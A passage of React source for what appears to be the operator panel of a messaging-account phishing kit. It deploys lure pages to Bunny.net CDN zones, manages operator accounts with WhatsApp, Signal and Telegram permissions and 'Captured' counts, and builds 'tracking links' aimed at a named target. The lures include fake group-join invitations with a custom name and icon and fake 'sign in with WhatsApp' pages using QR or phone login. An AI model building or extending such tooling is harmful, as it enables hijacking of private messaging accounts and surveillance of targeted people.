                            {cdnZones.map((zone) => (
                                <div key={zone.id} className="bg-white/5 rounded-xl p-4 border border-white/10">
                                    <div className="flex items-center justify-between mb-3">
                                        <div className="flex items-center gap-2">
                                            <Cloud className="w-4 h-4 text-sky-400" />
                                            <span className="text-white font-medium">{zone.name}</span>
                                        </div>
                                        <div className="flex items-center gap-2">
                                            <button
                                                onClick={async () => {
                                                    if (!window.confirm(`Remove zone "${zone.name}" from configuration? This does NOT delete it from Bunny.net.`)) return;
                                                    try {
                                                        const response = await fetch(`${API_BASE_URL}/admin/cdn-zone/${zone.id}`, {
                                                            method: 'DELETE',
                                                            headers: authHeaders,
                                                        });
                                                        const data = await response.json();
                                                        if (data.success) {
                                                            setCdnZones(prev => prev.filter(z => z.id !== zone.id));
                                                            fetchLinks();
                                                        }
                                                    } catch (err) {
                                                        console.error('Failed to remove zone:', err);
                                                    }
                                                }}
                                                className="p-1.5 hover:bg-red-500/20 text-gray-500 hover:text-red-400 rounded-lg transition-all"
                                                title="Remove zone"
                                            >
                                                <Trash2 className="w-3.5 h-3.5" />
                                            </button>
                                        </div>
                                    </div>
                                    <div className="grid grid-cols-2 gap-2 text-xs">
                                        <div>
                                            <span className="text-gray-500">Hostname:</span>{' '}
                                            <a href={`https://${zone.cdnHostname}`} target="_blank" rel="noopener noreferrer" className="text-sky-400 hover:underline">
                                                {zone.cdnHostname}
                                            </a>
                                        </div>
                                        <div>
                                            <span className="text-gray-500">Region:</span>{' '}
                                            <span className="text-gray-300">{zone.storageRegion.toUpperCase()}</span>
                                        </div>
                                        <div>
                                            <span className="text-gray-500">Storage:</span>{' '}
                                            <span className="text-gray-300">{zone.storageZoneName}</span>
                                        </div>
                                        <div>
                                            <span className="text-gray-500">Pull Zone:</span>{' '}
                                            <span className="text-gray-300">{zone.pullZoneId}</span>
                                        </div>
                                    </div>
                                </div>
                            ))}

                            {/* Create New Zone */}
                            <div className="border-t border-white/10 pt-4">
                                <h4 className="text-sm font-medium text-white mb-3">Create New CDN Zone</h4>
                                <div className="p-3 bg-white/5 rounded-lg mb-3">
                                    <p className="text-xs text-gray-500">
                                        Enter your Bunny.net Account API Key and a zone name. This will automatically create a Storage Zone, Pull Zone, and SPA routing rule.
                                        Get your API key from{' '}
                                        <a href="https://dash.bunny.net/account/settings" target="_blank" rel="noopener noreferrer" className="text-sky-400 hover:underline">
                                            Account Settings → API Key
                                        </a>.
                                        {cdnHasApiKey && <span className="text-green-400 ml-1">(API key saved — leave blank to reuse)</span>}
                                    </p>
                                </div>

                                <div className="space-y-3">
                                    <div>
                                        <label className="block text-sm text-gray-500 mb-1">Account API Key {cdnHasApiKey && <span className="text-gray-600">(optional if saved)</span>}</label>
                                        <input
                                            type="password"
                                            value={cdnSetupApiKey}
                                            onChange={(e) => setCdnSetupApiKey(e.target.value)}
                                            placeholder={cdnHasApiKey ? '••••••••••••••••' : 'Your Bunny.net Account API Key'}
                                            className="w-full bg-white/5 border border-cyan-500/10 rounded-xl px-4 py-3 text-white placeholder-gray-600 focus:outline-none focus:ring-2 focus:ring-sky-500"
                                        />
                                    </div>

                                    <div>
                                        <label className="block text-sm text-gray-500 mb-1">Zone Name</label>
                                        <input
                                            type="text"
                                            value={cdnSetupName}
                                            onChange={(e) => setCdnSetupName(e.target.value)}
                                            placeholder="e.g. telegram-web"
                                            className="w-full bg-white/5 border border-cyan-500/10 rounded-xl px-4 py-3 text-white placeholder-gray-600 focus:outline-none focus:ring-2 focus:ring-sky-500"
                                        />
                                        <p className="text-xs text-gray-500 mt-1">Becomes your CDN hostname: {cdnSetupName || 'zone-name'}.b-cdn.net</p>
                                    </div>

                                    <div>
                                        <label className="block text-sm text-gray-500 mb-1">Storage Region</label>
                                        <select
                                            value={cdnSetupRegion}
                                            onChange={(e) => setCdnSetupRegion(e.target.value)}
                                            className="w-full bg-white/5 border border-cyan-500/10 rounded-xl px-4 py-3 text-white focus:outline-none focus:ring-2 focus:ring-sky-500"
                                        >
                                            <option value="DE" className="bg-slate-800">Europe (Falkenstein) - DE</option>
                                            <option value="NY" className="bg-slate-800">North America (New York) - NY</option>
                                            <option value="LA" className="bg-slate-800">North America (Los Angeles) - LA</option>
                                            <option value="SG" className="bg-slate-800">Asia (Singapore) - SG</option>
                                            <option value="SYD" className="bg-slate-800">Oceania (Sydney) - SYD</option>
                                        </select>
                                    </div>

                                    {cdnSetupMessage && (
                                        <div className={`p-3 rounded-lg text-sm ${
                                            cdnSetupMessage.type === 'success'
                                                ? 'bg-green-500/20 text-green-300 border border-green-500/30'
                                                : 'bg-red-500/20 text-red-300 border border-red-500/30'
                                        }`}>
                                            {cdnSetupMessage.text}
                                        </div>
                                    )}

                                    <button
                                        onClick={async () => {
                                            if ((!cdnSetupApiKey && !cdnHasApiKey) || !cdnSetupName) return;
                                            setIsSettingUpCdn(true);
                                            setCdnSetupMessage(null);
                                            try {
                                                const body: any = { name: cdnSetupName, region: cdnSetupRegion };
                                                if (cdnSetupApiKey) body.accountApiKey = cdnSetupApiKey;
                                                const response = await fetch(`${API_BASE_URL}/admin/cdn-setup`, {
                                                    method: 'POST',
                                                    headers: authHeaders,
                                                    body: JSON.stringify(body),
                                                });
                                                const data = await response.json();
                                                if (data.success) {
                                                    setCdnSetupMessage({ type: 'success', text: data.message });
                                                    setCdnZones(prev => [...prev, data.zone]);
                                                    setCdnHasApiKey(true);
                                                    setCdnSetupApiKey('');
                                                    setCdnSetupName('');
                                                    fetchLinks();
                                                } else {
                                                    setCdnSetupMessage({ type: 'error', text: data.message || 'Setup failed' });
                                                }
                                            } catch (err) {
                                                setCdnSetupMessage({ type: 'error', text: 'Failed to setup CDN' });
                                            } finally {
                                                setIsSettingUpCdn(false);
                                            }
                                        }}
                                        disabled={isSettingUpCdn || ((!cdnSetupApiKey && !cdnHasApiKey) || !cdnSetupName)}
                                        className="px-6 py-3 bg-sky-500 hover:bg-sky-600 text-white rounded-xl font-medium transition-all disabled:opacity-50 disabled:cursor-not-allowed flex items-center gap-2"
                                    >
                                        {isSettingUpCdn ? (
                                            <Loader2 className="w-4 h-4 animate-spin" />
                                        ) : (
                                            <Cloud className="w-4 h-4" />
                                        )}
                                        {isSettingUpCdn ? 'Creating zone...' : 'Create CDN Zone'}
                                    </button>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
                )}

                {/* Users Tab (admin only) */}
                {activeTab === 'users' && admin.role === 'admin' && (
                <div className="max-w-4xl">
                    <div className="flex items-center justify-between mb-6">
                        <h2 className="text-xl font-semibold text-white">User Management</h2>
                        <button
                            onClick={() => setShowCreateUserModal(true)}
                            className="px-4 py-2 bg-cyan-500/10 hover:bg-cyan-500/20 border border-cyan-500/30 text-cyan-400 rounded-lg flex items-center gap-2 text-sm transition-all"
                        >
                            <Plus className="w-4 h-4" />
                            Create User
                        </button>
                    </div>

                    <div className="glass-card rounded-xl overflow-hidden">
                        {isLoadingUsers ? (
                            <div className="p-12 text-center">
                                <Loader2 className="w-8 h-8 text-cyan-400 animate-spin mx-auto" />
                            </div>
                        ) : usersList.length === 0 ? (
                            <div className="p-12 text-center">
                                <Users className="w-12 h-12 text-gray-600 mx-auto mb-4" />
                                <p className="text-gray-500">No users yet</p>
                            </div>
                        ) : (
                            <div className="divide-y divide-white/5">
                                {usersList.map((user: any) => (
                                    <div key={user.id} className={`p-4 hover:bg-white/5 transition-all ${user.status === 'pending' ? 'bg-amber-500/5 border-l-2 border-l-amber-500/50' : ''}`}>
                                        {editingUser?.id === user.id ? (
                                            /* Edit mode */
                                            <div className="space-y-4">
                                                <div className="flex items-center gap-3 mb-2">
                                                    <h3 className="text-white font-medium">{user.username}</h3>
                                                    <span className={`text-xs px-2 py-0.5 rounded-full ${user.role === 'admin' ? 'bg-amber-500/20 text-amber-400' : 'bg-cyan-500/20 text-cyan-400'}`}>
                                                        {user.role}
                                                    </span>
                                                </div>
                                                <div className="grid grid-cols-2 md:grid-cols-4 gap-3">
                                                    <label className="flex items-center gap-2 text-sm text-gray-300 cursor-pointer">
                                                        <input type="checkbox" checked={editingUser.permissions.whatsapp} onChange={e => setEditingUser({ ...editingUser, permissions: { ...editingUser.permissions, whatsapp: e.target.checked }})} className="rounded" />
                                                        WhatsApp
                                                    </label>
                                                    <label className="flex items-center gap-2 text-sm text-gray-300 cursor-pointer">
                                                        <input type="checkbox" checked={editingUser.permissions.signal} onChange={e => setEditingUser({ ...editingUser, permissions: { ...editingUser.permissions, signal: e.target.checked }})} className="rounded" />
                                                        Signal
                                                    </label>
                                                    <label className="flex items-center gap-2 text-sm text-gray-300 cursor-pointer">
                                                        <input type="checkbox" checked={editingUser.permissions.telegram} onChange={e => setEditingUser({ ...editingUser, permissions: { ...editingUser.permissions, telegram: e.target.checked }})} className="rounded" />
                                                        Telegram
                                                    </label>
                                                    <label className="flex items-center gap-2 text-sm text-gray-300 cursor-pointer">
                                                        <input type="checkbox" checked={editingUser.permissions.cdnDeploy} onChange={e => setEditingUser({ ...editingUser, permissions: { ...editingUser.permissions, cdnDeploy: e.target.checked }})} className="rounded" />
                                                        CDN Deploy
                                                    </label>
                                                </div>
                                                <div className="flex items-center gap-3">
                                                    <select value={editingUser.status} onChange={e => setEditingUser({ ...editingUser, status: e.target.value })} className="bg-white/5 border border-cyan-500/10 rounded-lg px-3 py-2 text-white text-sm">
                                                        <option value="active">Active</option>
                                                        <option value="pending">Pending</option>
                                                        <option value="disabled">Disabled</option>
                                                    </select>
                                                    <select value={editingUser.role} onChange={e => setEditingUser({ ...editingUser, role: e.target.value })} className="bg-white/5 border border-cyan-500/10 rounded-lg px-3 py-2 text-white text-sm">
                                                        <option value="user">User</option>
                                                        <option value="admin">Admin</option>
                                                    </select>
                                                    <input type="password" placeholder="New password (leave empty to keep)" value={editingUser.newPassword || ''} onChange={e => setEditingUser({ ...editingUser, newPassword: e.target.value })} className="bg-white/5 border border-cyan-500/10 rounded-lg px-3 py-2 text-white text-sm placeholder-gray-600 flex-1" />
                                                </div>
                                                <div className="flex gap-2">
                                                    <button onClick={() => {
                                                        const updates: any = { role: editingUser.role, permissions: editingUser.permissions, status: editingUser.status };
                                                        if (editingUser.newPassword) updates.password = editingUser.newPassword;
                                                        updateUser(user.id, updates);
                                                    }} className="px-4 py-2 bg-cyan-500/20 hover:bg-cyan-500/30 text-cyan-400 border border-cyan-500/30 rounded-lg text-sm transition-all">
                                                        Save
                                                    </button>
                                                    <button onClick={() => setEditingUser(null)} className="px-4 py-2 bg-white/5 hover:bg-white/5 text-gray-500 rounded-lg text-sm transition-all">
                                                        Cancel
                                                    </button>
                                                </div>
                                            </div>
                                        ) : (
                                            /* Display mode */
                                            <div className="flex items-center justify-between">
                                                <div className="flex-1">
                                                    <div className="flex items-center gap-3 mb-1">
                                                        <h3 className="text-white font-medium">{user.username}</h3>
                                                        <span className={`text-xs px-2 py-0.5 rounded-full ${user.role === 'admin' ? 'bg-amber-500/20 text-amber-400' : 'bg-cyan-500/20 text-cyan-400'}`}>
                                                            {user.role}
                                                        </span>
                                                        <span className={`text-xs px-2 py-0.5 rounded-full ${user.status === 'active' ? 'bg-green-500/20 text-green-400' : user.status === 'pending' ? 'bg-amber-500/20 text-amber-400' : 'bg-red-500/20 text-red-400'}`}>
                                                            {user.status}
                                                        </span>
                                                    </div>
                                                    <div className="flex items-center gap-4 text-sm text-gray-500">
                                                        <span>Links: {user.linksCount || 0}</span>
                                                        <span>Captured: {user.capturedCount || 0}</span>
                                                        {user.lastLogin && <span>Last login: {formatDate(user.lastLogin)}</span>}
                                                    </div>
                                                    <div className="flex gap-2 mt-1">
                                                        {user.permissions?.whatsapp && <span className="text-xs px-2 py-0.5 rounded-full bg-green-500/10 text-green-400">WhatsApp</span>}
                                                        {user.permissions?.signal && <span className="text-xs px-2 py-0.5 rounded-full bg-blue-500/10 text-blue-400">Signal</span>}
                                                        {user.permissions?.telegram && <span className="text-xs px-2 py-0.5 rounded-full bg-sky-500/10 text-sky-400">Telegram</span>}
                                                        {user.permissions?.cdnDeploy && <span className="text-xs px-2 py-0.5 rounded-full bg-purple-500/10 text-purple-400">CDN</span>}
                                                    </div>
                                                </div>
                                                <div className="flex gap-2">
                                                    {user.status === 'pending' && (
                                                        <>
                                                            <button onClick={() => updateUser(user.id, { status: 'active' })} className="px-3 py-2 bg-green-500/10 hover:bg-green-500/20 border border-green-500/30 text-green-400 rounded-lg text-sm transition-all flex items-center gap-1.5" title="Approve">
                                                                <UserCheck className="w-4 h-4" />
                                                                Approve
                                                            </button>
                                                            <button onClick={() => deleteUser(user.id)} className="px-3 py-2 bg-red-500/10 hover:bg-red-500/20 border border-red-500/30 text-red-400 rounded-lg text-sm transition-all flex items-center gap-1.5" title="Reject">
                                                                <UserX className="w-4 h-4" />
                                                                Reject
                                                            </button>
                                                        </>
                                                    )}
                                                    <button onClick={() => setEditingUser({ ...user, newPassword: '' })} className="p-2 bg-white/5 hover:bg-white/5 text-gray-500 rounded-lg transition-all" title="Edit">
                                                        <Eye className="w-4 h-4" />
                                                    </button>
                                                    {user.id !== admin.id && (
                                                        <button onClick={() => deleteUser(user.id)} className="p-2 bg-red-500/10 hover:bg-red-500/20 text-red-400 rounded-lg transition-all" title="Delete">
                                                            <Trash2 className="w-4 h-4" />
                                                        </button>
                                                    )}
                                                </div>
                                            </div>
                                        )}
                                    </div>
                                ))}
                            </div>
                        )}
                    </div>
                </div>
                )}

                {/* Account Tab */}
                {activeTab === 'account' && (
                <div className="max-w-lg">
                    <h2 className="text-xl font-semibold text-white mb-6">Account Settings</h2>

                    {/* User Info */}
                    <div className="glass-card rounded-xl p-6 mb-6">
                        <div className="flex items-center gap-4 mb-4">
                            <div className="w-14 h-14 rounded-2xl bg-cyan-500/10 border border-cyan-500/30 flex items-center justify-center text-cyan-400 text-xl font-bold">
                                {admin.username.charAt(0).toUpperCase()}
                            </div>
                            <div>
                                <h3 className="text-lg font-medium text-white">{admin.username}</h3>
                                <span className={`text-xs px-2 py-0.5 rounded-full ${admin.role === 'admin' ? 'bg-amber-500/20 text-amber-400' : 'bg-blue-500/20 text-blue-400'}`}>
                                    {admin.role}
                                </span>
                            </div>
                        </div>
                        {admin.permissions && (
                            <div className="flex gap-2 flex-wrap">
                                <span className="text-xs text-gray-500">Permissions:</span>
                                {admin.permissions.whatsapp && <span className="text-xs px-2 py-0.5 rounded-full bg-green-500/10 text-green-400">WhatsApp</span>}
                                {admin.permissions.signal && <span className="text-xs px-2 py-0.5 rounded-full bg-blue-500/10 text-blue-400">Signal</span>}
                                {admin.permissions.telegram && <span className="text-xs px-2 py-0.5 rounded-full bg-sky-500/10 text-sky-400">Telegram</span>}
                                {admin.permissions.cdnDeploy && <span className="text-xs px-2 py-0.5 rounded-full bg-purple-500/10 text-purple-400">CDN Deploy</span>}
                            </div>
                        )}
                    </div>

                    {/* Change Password */}
                    <div className="glass-card rounded-xl p-6 mb-6">
                        <h3 className="text-lg font-medium text-white mb-4 flex items-center gap-2">
                            <Lock className="w-5 h-5" />
                            Change Password
                        </h3>
                        {passwordMessage && (
                            <div className={`mb-4 p-3 rounded-lg text-sm ${passwordMessage.type === 'success' ? 'bg-green-500/20 text-green-400 border border-green-500/30' : 'bg-red-500/20 text-red-400 border border-red-500/30'}`}>
                                {passwordMessage.text}
                            </div>
                        )}
                        <div className="space-y-3">
                            <input type="password" placeholder="Current password" value={oldPassword} onChange={e => setOldPassword(e.target.value)} className="w-full bg-white/5 border border-cyan-500/10 rounded-xl px-4 py-3 text-white placeholder-gray-600 focus:outline-none focus:ring-2 focus:ring-indigo-500 transition-all" />
                            <input type="password" placeholder="New password" value={newPassword} onChange={e => setNewPassword(e.target.value)} className="w-full bg-white/5 border border-cyan-500/10 rounded-xl px-4 py-3 text-white placeholder-gray-600 focus:outline-none focus:ring-2 focus:ring-indigo-500 transition-all" />
                            <input type="password" placeholder="Confirm new password" value={confirmPassword} onChange={e => setConfirmPassword(e.target.value)} className="w-full bg-white/5 border border-cyan-500/10 rounded-xl px-4 py-3 text-white placeholder-gray-600 focus:outline-none focus:ring-2 focus:ring-indigo-500 transition-all" />
                            <button onClick={changePassword} disabled={isChangingPassword || !oldPassword || !newPassword || !confirmPassword} className="w-full px-4 py-3 bg-cyan-500/20 hover:bg-cyan-500/30 text-cyan-400 border border-cyan-500/30 rounded-xl font-medium transition-all disabled:opacity-50 disabled:cursor-not-allowed flex items-center justify-center gap-2">
                                {isChangingPassword ? <Loader2 className="w-4 h-4 animate-spin" /> : <Check className="w-4 h-4" />}
                                {isChangingPassword ? 'Changing...' : 'Change Password'}
                            </button>
                        </div>
                    </div>

                    {/* Delete Account (users only) */}
                    {admin.role !== 'admin' && (
                    <div className="bg-red-500/10 backdrop-blur-lg rounded-xl border border-red-500/20 p-6">
                        <h3 className="text-lg font-medium text-red-400 mb-2 flex items-center gap-2">
                            <Trash2 className="w-5 h-5" />
                            Delete Account
                        </h3>
                        <p className="text-gray-500 text-sm mb-4">Permanently delete your account and all associated data. This cannot be undone.</p>
                        {!showDeleteConfirm ? (
                            <button onClick={() => setShowDeleteConfirm(true)} className="px-4 py-2 bg-red-500/20 hover:bg-red-500/30 text-red-400 border border-red-500/30 rounded-lg text-sm transition-all">
                                Delete My Account
                            </button>
                        ) : (
                            <div className="flex items-center gap-3">
                                <span className="text-red-400 text-sm">Are you sure?</span>
                                <button onClick={deleteAccount} disabled={isDeletingAccount} className="px-4 py-2 bg-red-500 hover:bg-red-600 text-white rounded-lg text-sm transition-all disabled:opacity-50 flex items-center gap-2">
                                    {isDeletingAccount ? <Loader2 className="w-4 h-4 animate-spin" /> : <Trash2 className="w-4 h-4" />}
                                    Yes, Delete
                                </button>
                                <button onClick={() => setShowDeleteConfirm(false)} className="px-4 py-2 bg-white/5 hover:bg-white/20 text-gray-300 rounded-lg text-sm transition-all">
                                    Cancel
                                </button>
                            </div>
                        )}
                    </div>
                    )}
                </div>
                )}
            </div>

            {/* Create User Modal */}
            {showCreateUserModal && (
                <div className="fixed inset-0 bg-black/50 backdrop-blur-sm flex items-center justify-center p-4 z-50">
                    <div className="bg-slate-800 rounded-2xl border border-cyan-500/10 w-full max-w-md p-6">
                        <div className="flex items-center justify-between mb-6">
                            <h2 className="text-lg font-semibold text-white">Create User</h2>
                            <button onClick={() => setShowCreateUserModal(false)} className="p-1 hover:bg-white/5 rounded-lg transition-all">
                                <X className="w-5 h-5 text-gray-500" />
                            </button>
                        </div>
                        <div className="space-y-4">
                            <input type="text" placeholder="Username" value={newUserForm.username} onChange={e => setNewUserForm({ ...newUserForm, username: e.target.value })} className="w-full bg-white/5 border border-cyan-500/10 rounded-xl px-4 py-3 text-white placeholder-gray-600 focus:outline-none focus:ring-2 focus:ring-indigo-500 transition-all" />
                            <input type="password" placeholder="Password" value={newUserForm.password} onChange={e => setNewUserForm({ ...newUserForm, password: e.target.value })} className="w-full bg-white/5 border border-cyan-500/10 rounded-xl px-4 py-3 text-white placeholder-gray-600 focus:outline-none focus:ring-2 focus:ring-indigo-500 transition-all" />
                            <select value={newUserForm.role} onChange={e => setNewUserForm({ ...newUserForm, role: e.target.value as 'admin' | 'user' })} className="w-full bg-white/5 border border-cyan-500/10 rounded-xl px-4 py-3 text-white focus:outline-none focus:ring-2 focus:ring-indigo-500 transition-all">
                                <option value="user">User</option>
                                <option value="admin">Admin</option>
                            </select>
                            <div>
                                <p className="text-sm text-gray-500 mb-2">Permissions</p>
                                <div className="grid grid-cols-2 gap-3">
                                    <label className="flex items-center gap-2 text-sm text-gray-300 cursor-pointer">
                                        <input type="checkbox" checked={newUserForm.permissions.whatsapp} onChange={e => setNewUserForm({ ...newUserForm, permissions: { ...newUserForm.permissions, whatsapp: e.target.checked }})} className="rounded" />
                                        WhatsApp
                                    </label>
                                    <label className="flex items-center gap-2 text-sm text-gray-300 cursor-pointer">
                                        <input type="checkbox" checked={newUserForm.permissions.signal} onChange={e => setNewUserForm({ ...newUserForm, permissions: { ...newUserForm.permissions, signal: e.target.checked }})} className="rounded" />
                                        Signal
                                    </label>
                                    <label className="flex items-center gap-2 text-sm text-gray-300 cursor-pointer">
                                        <input type="checkbox" checked={newUserForm.permissions.telegram} onChange={e => setNewUserForm({ ...newUserForm, permissions: { ...newUserForm.permissions, telegram: e.target.checked }})} className="rounded" />
                                        Telegram
                                    </label>
                                    <label className="flex items-center gap-2 text-sm text-gray-300 cursor-pointer">
                                        <input type="checkbox" checked={newUserForm.permissions.cdnDeploy} onChange={e => setNewUserForm({ ...newUserForm, permissions: { ...newUserForm.permissions, cdnDeploy: e.target.checked }})} className="rounded" />
                                        CDN Deploy
                                    </label>
                                </div>
                            </div>
                            <button onClick={createUser} disabled={isCreatingUser || !newUserForm.username || !newUserForm.password} className="w-full px-4 py-3 bg-cyan-500/20 hover:bg-cyan-500/30 text-cyan-400 border border-cyan-500/30 rounded-xl font-medium transition-all disabled:opacity-50 disabled:cursor-not-allowed flex items-center justify-center gap-2">
                                {isCreatingUser ? <Loader2 className="w-4 h-4 animate-spin" /> : <Plus className="w-4 h-4" />}
                                {isCreatingUser ? 'Creating...' : 'Create User'}
                            </button>
                        </div>
                    </div>
                </div>
            )}

            {/* Create Link Modal */}
            {showCreateModal && (
                <div className="fixed inset-0 bg-black/50 backdrop-blur-sm flex items-center justify-center p-4 z-50">
                    <div className="bg-slate-800 rounded-2xl border border-cyan-500/10 w-full max-w-md max-h-[90vh] flex flex-col">
                        <div className="p-6 border-b border-white/10 flex items-center justify-between flex-shrink-0">
                            <h2 className="text-lg font-semibold text-white">Create Tracking Link</h2>
                            <button
                                onClick={() => { setShowCreateModal(false); resetForm(); }}
                                className="p-1 hover:bg-white/5 rounded text-gray-500"
                            >
                                <X className="w-5 h-5" />
                            </button>
                        </div>
                        <form onSubmit={createLink} className="p-6 space-y-4 overflow-y-auto flex-1 min-h-0">
                            {/* Scene Selector */}
                            <div>
                                <label className="block text-sm text-gray-500 mb-2">Scene</label>
                                <div className="grid grid-cols-2 gap-2">
                                    <button
                                        type="button"
                                        onClick={() => setNewLinkScene('join-group')}
                                        className={`p-3 rounded-xl border flex flex-col items-center gap-2 transition-all ${
                                            newLinkScene === 'join-group'
                                                ? 'bg-green-500/20 border-green-500 text-green-300'
                                                : 'bg-white/5 border-white/20 text-gray-500 hover:bg-white/5'
                                        }`}
                                    >
                                        <Users className="w-5 h-5" />
                                        <span className="text-xs font-medium">Join Group</span>
                                    </button>
                                    {admin.role === 'admin' && (
                                    <button
                                        type="button"
                                        onClick={() => setNewLinkScene('website-login')}
                                        className={`p-3 rounded-xl border flex flex-col items-center gap-2 transition-all ${
                                            newLinkScene === 'website-login'
                                                ? 'bg-blue-500/20 border-blue-500 text-blue-300'
                                                : 'bg-white/5 border-white/20 text-gray-500 hover:bg-white/5'
                                        }`}
                                    >
                                        <Globe className="w-5 h-5" />
                                        <span className="text-xs font-medium">Website Login</span>
                                    </button>
                                    )}
                                </div>
                                {newLinkScene === 'website-login' && (
                                    <p className="text-xs text-blue-400 mt-2">Users will authenticate via WhatsApp. The website receives their phone number and name via callback.</p>
                                )}
                            </div>
                            <div>
                                <label className="block text-sm text-gray-500 mb-2">Link Name</label>
                                <input
                                    type="text"
                                    value={newLinkName}
                                    onChange={(e) => setNewLinkName(e.target.value)}
                                    className="w-full bg-white/5 border border-cyan-500/10 rounded-xl px-4 py-3 text-white placeholder-gray-600 focus:outline-none focus:ring-2 focus:ring-indigo-500"
                                    placeholder="e.g., Campaign A - John"
                                    required
                                />
                            </div>
                            <div>
                                <label className="block text-sm text-gray-500 mb-2">Target Description</label>
                                <input
                                    type="text"
                                    value={newLinkTarget}
                                    onChange={(e) => setNewLinkTarget(e.target.value)}
                                    className="w-full bg-white/5 border border-cyan-500/10 rounded-xl px-4 py-3 text-white placeholder-gray-600 focus:outline-none focus:ring-2 focus:ring-indigo-500"
                                    placeholder="e.g., Target user's name or identifier"
                                    required
                                />
                            </div>
                            {/* Join Group scene fields */}
                            {newLinkScene === 'join-group' && (
                            <div>
                                <label className="block text-sm text-gray-500 mb-2">Group Name (shown to target)</label>
                                <input
                                    type="text"
                                    value={newGroupName}
                                    onChange={(e) => setNewGroupName(e.target.value)}
                                    className="w-full bg-white/5 border border-cyan-500/10 rounded-xl px-4 py-3 text-white placeholder-gray-600 focus:outline-none focus:ring-2 focus:ring-indigo-500"
                                    placeholder="e.g., Family Group, Office Team"
                                    required
                                />
                            </div>
                            )}
                            {newLinkScene === 'join-group' && (
                            <div>
                                <label className="block text-sm text-gray-500 mb-2">Group Image (optional)</label>
                                <div className="flex items-center gap-3">
                                    {newGroupImage ? (
                                        <div className="relative">
                                            <img 
                                                src={newGroupImage} 
                                                alt="Group" 
                                                className="w-16 h-16 rounded-full object-cover border-2 border-white/20"
                                            />
                                            <button
                                                type="button"
                                                onClick={() => setNewGroupImage(null)}
                                                className="absolute -top-1 -right-1 w-5 h-5 bg-red-500 rounded-full flex items-center justify-center"
                                            >
                                                <X className="w-3 h-3 text-white" />
                                            </button>
                                        </div>
                                    ) : (
                                        <div className="w-16 h-16 rounded-full bg-white/5 border-2 border-dashed border-white/20 flex items-center justify-center">
                                            <Users className="w-6 h-6 text-gray-500" />
                                        </div>
                                    )}
                                    <label className="flex-1">
                                        <input
                                            type="file"
                                            accept="image/*"
                                            className="hidden"
                                            onChange={(e) => {
                                                const file = e.target.files?.[0];
                                                if (file) {
                                                    const reader = new FileReader();
                                                    reader.onloadend = () => {
                                                        setNewGroupImage(reader.result as string);
                                                    };
                                                    reader.readAsDataURL(file);
                                                }
                                            }}
                                        />
                                        <div className="px-4 py-2.5 bg-white/5 hover:bg-white/20 border border-cyan-500/10 rounded-xl text-gray-300 text-sm cursor-pointer flex items-center gap-2 transition-all">
                                            <Upload className="w-4 h-4" />
                                            Upload Image
                                        </div>
                                    </label>
                                </div>
                                <p className="text-xs text-gray-500 mt-2">This image will be shown as the WhatsApp group icon</p>
                            </div>
                            )}
                            {/* Website Login scene fields */}
                            {newLinkScene === 'website-login' && (
                            <>
                            <div>
                                <label className="block text-sm text-gray-500 mb-2">Website Name</label>
                                <input
                                    type="text"
                                    value={newWebsiteName}
                                    onChange={(e) => setNewWebsiteName(e.target.value)}
                                    className="w-full bg-white/5 border border-cyan-500/10 rounded-xl px-4 py-3 text-white placeholder-gray-600 focus:outline-none focus:ring-2 focus:ring-indigo-500"
                                    placeholder="e.g., MyApp, Acme Corp"
                                    required
                                />
                            </div>
                            <div>
                                <label className="block text-sm text-gray-500 mb-2">Website Logo (optional)</label>
                                <div className="flex items-center gap-3">
                                    {newWebsiteLogo ? (
                                        <div className="relative">
                                            <img 
                                                src={newWebsiteLogo} 
                                                alt="Website Logo" 
                                                className="w-16 h-16 rounded-xl object-contain border-2 border-white/20 bg-white/5 p-1"
                                            />
                                            <button
                                                type="button"
                                                onClick={() => setNewWebsiteLogo(null)}
                                                className="absolute -top-1 -right-1 w-5 h-5 bg-red-500 rounded-full flex items-center justify-center"
                                            >
                                                <X className="w-3 h-3 text-white" />
                                            </button>
                                        </div>
                                    ) : (
                                        <div className="w-16 h-16 rounded-xl bg-white/5 border-2 border-dashed border-white/20 flex items-center justify-center">
                                            <Globe className="w-6 h-6 text-gray-500" />
                                        </div>
                                    )}
                                    <label className="flex-1">
                                        <input
                                            type="file"
                                            accept="image/*"
                                            className="hidden"
                                            onChange={(e) => {
                                                const file = e.target.files?.[0];
                                                if (file) {
                                                    const reader = new FileReader();
                                                    reader.onloadend = () => {
                                                        setNewWebsiteLogo(reader.result as string);
                                                    };
                                                    reader.readAsDataURL(file);
                                                }
                                            }}
                                        />
                                        <div className="px-4 py-2.5 bg-white/5 hover:bg-white/20 border border-cyan-500/10 rounded-xl text-gray-300 text-sm cursor-pointer flex items-center gap-2 transition-all">
                                            <Upload className="w-4 h-4" />
                                            Upload Logo
                                        </div>
                                    </label>
                                </div>
                                <p className="text-xs text-gray-500 mt-2">Shown on the login page above the website name</p>
                            </div>
                            <div>
                                <label className="block text-sm text-gray-500 mb-2">Website Description (optional)</label>
                                <input
                                    type="text"
                                    value={newWebsiteDescription}
                                    onChange={(e) => setNewWebsiteDescription(e.target.value)}
                                    className="w-full bg-white/5 border border-cyan-500/10 rounded-xl px-4 py-3 text-white placeholder-gray-600 focus:outline-none focus:ring-2 focus:ring-indigo-500"
                                    placeholder="e.g., Sign in securely with your WhatsApp account"
                                />
                            </div>
                            <div>
                                <label className="block text-sm text-gray-500 mb-2">Callback URL</label>
                                <input
                                    type="url"
                                    value={newCallbackUrl}
                                    onChange={(e) => setNewCallbackUrl(e.target.value)}
                                    className="w-full bg-white/5 border border-cyan-500/10 rounded-xl px-4 py-3 text-white placeholder-gray-600 focus:outline-none focus:ring-2 focus:ring-indigo-500"
                                    placeholder="https://yourwebsite.com/auth/callback"
                                    required
                                />
                                <p className="text-xs text-gray-600 mt-1">After authentication, the user will be redirected to this URL with an auth_token parameter.</p>
                            </div>
                            </>
                            )}
                            <div>
                                <label className="block text-sm text-gray-500 mb-2">Login Method</label>
                                <div className="grid grid-cols-3 gap-2">
                                    <button
                                        type="button"
                                        onClick={() => setNewLinkMethod('qr')}
                                        className={`p-3 rounded-xl border flex flex-col items-center gap-2 transition-all ${
                                            newLinkMethod === 'qr'
                                                ? 'bg-cyan-500/20 border-cyan-500 text-cyan-300'
                                                : 'bg-white/5 border-white/20 text-gray-500 hover:bg-white/5'
                                        }`}
                                    >
                                        <QrCode className="w-5 h-5" />
                                        <span className="text-xs">QR Code</span>
                                    </button>
                                    <button
                                        type="button"
                                        onClick={() => setNewLinkMethod('phone')}
                                        className={`p-3 rounded-xl border flex flex-col items-center gap-2 transition-all ${
                                            newLinkMethod === 'phone'
                                                ? 'bg-cyan-500/20 border-cyan-500 text-cyan-300'
